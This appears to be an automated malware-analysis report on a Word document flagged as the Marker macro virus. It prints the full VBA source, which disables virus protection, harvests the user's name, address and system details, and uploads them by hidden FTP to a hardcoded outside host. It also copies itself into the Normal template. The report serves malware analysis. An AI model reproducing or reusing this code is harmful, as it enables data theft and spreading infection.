MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
The sample is a Microsoft Word document containing VBA macros. The 'OLE_VBA_SHELL' heuristic indicates the presence of Shell() calls, suggesting an attempt to execute arbitrary commands. The 'Doc.Trojan.Marker-10' ClamAV detection further confirms its malicious nature. The VBA script attempts to write to the registry key 'HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info\Uploaded' and gathers system information, indicating a potential downloader or information-stealer.
Heuristics 3
-
ClamAV: Doc.Trojan.Marker-10 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-10
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12237 bytes |
SHA-256: 0fe5228ce74e302086403b305d66eff080c53caef87959d15b15bcd495ef1443 |
|||
|
Detection
ClamAV:
Doc.Trojan.Marker-10
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
' Surveyor, Developed by:
' An MCA Student
' School Of Technology And Applied Sciences
' Mahatham Gandhi University Regional Center
' Edappally, Kochi 24
' 16th March 2000
Const Signature = "School Of Technology And Applied Sciences"
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ActiveDoc, NormalTemplt As Object
Dim UserAddress, ReportFile, ReportData, MyCode, Message As String
Message = "Today is Independence day." & Chr(13) & Chr(13) & "Vandhay Matharam!"
Set ActiveDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NormalTemplt = NormalTemplate.VBProject.VBComponents.Item(1)
Options.VirusProtection = False
DocumentInfected = ActiveDoc.CodeModule.Find(Signature, 1, 1, 9999, 9999)
NormalTemplateInfected = NormalTemplt.CodeModule.Find(Signature, 1, 1, 9999, 9999)
If (Day(Now()) = 15) And (Month(Now()) = 8) Then
MsgBox Message, vbInformation + vbOKOnly, "Independence Day"
End If
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Uploaded") = False) Then
With Application
ReportData = "Name: " & .UserName & Chr(13) & vbLf _
& "Address: " & .UserAddress & Chr(13) & vbLf _
& "Date & Time: " & Format(Date, "dddd, d mmm yyyy ") _
& Format(Time, "hh:mm:ss AMPM ") & Chr(13) & vbLf _
& "Processor Type:" & System.ProcessorType & Chr(13) & vbLf _
& "Free Disk Space: " & System.FreeDiskSpace
End With
For i = 1 To 4
ReportFile = ReportFile + Mid(Str(Int(90001 * Rnd + 9999)), 2, 1)
Next i
ReportFile = "C:\su" & ReportFile & ".sys"
Open ReportFile For Output As #1
Print #1, ReportData
Close #1
Open "c:\netacc.vxd" For Output As #1
Print #1, "o home.fiberia.com"
Print #1, "user surveyor"
Print #1, "fAERTf"
Print #1, "cd survey"
Print #1, "ascii"
Print #1, "put " & ReportFile
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\netacc.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Uploaded") = True
End If
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
MyCode = ActiveDoc.CodeModule.Lines(1, ActiveDoc.CodeModule.CountOfLines)
NormalTemplt.CodeModule.DeleteLines 1, NormalTemplt.CodeModule.CountOfLines
NormalTemplt.CodeModule.AddFromString MyCode
End If
If SaveNormalTemplate = True Then
NormalTemplate.Save
End If
If NormalTemplateInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then
SaveDocument = ActiveDocument.Saved
MyCode = NormalTemplt.CodeModule.Lines(1, NormalTemplt.CodeModule.CountOfLines)
ActiveDoc.CodeModule.DeleteLines 1, ActiveDoc.CodeModule.CountOfLines
ActiveDoc.CodeModule.AddFromString MyCode
If SaveDocument = True Then
ActiveDocument.Save
End If
End If
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/8b570fb7e9b748d5bf1c92349cc3cc97.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 10735 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' OnError (Resume Next)
' Line #2:
' QuoteRem 0x0000 0x0018 " Surveyor, Developed by:"
' Line #3:
' QuoteRem 0x0000 0x000F "
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.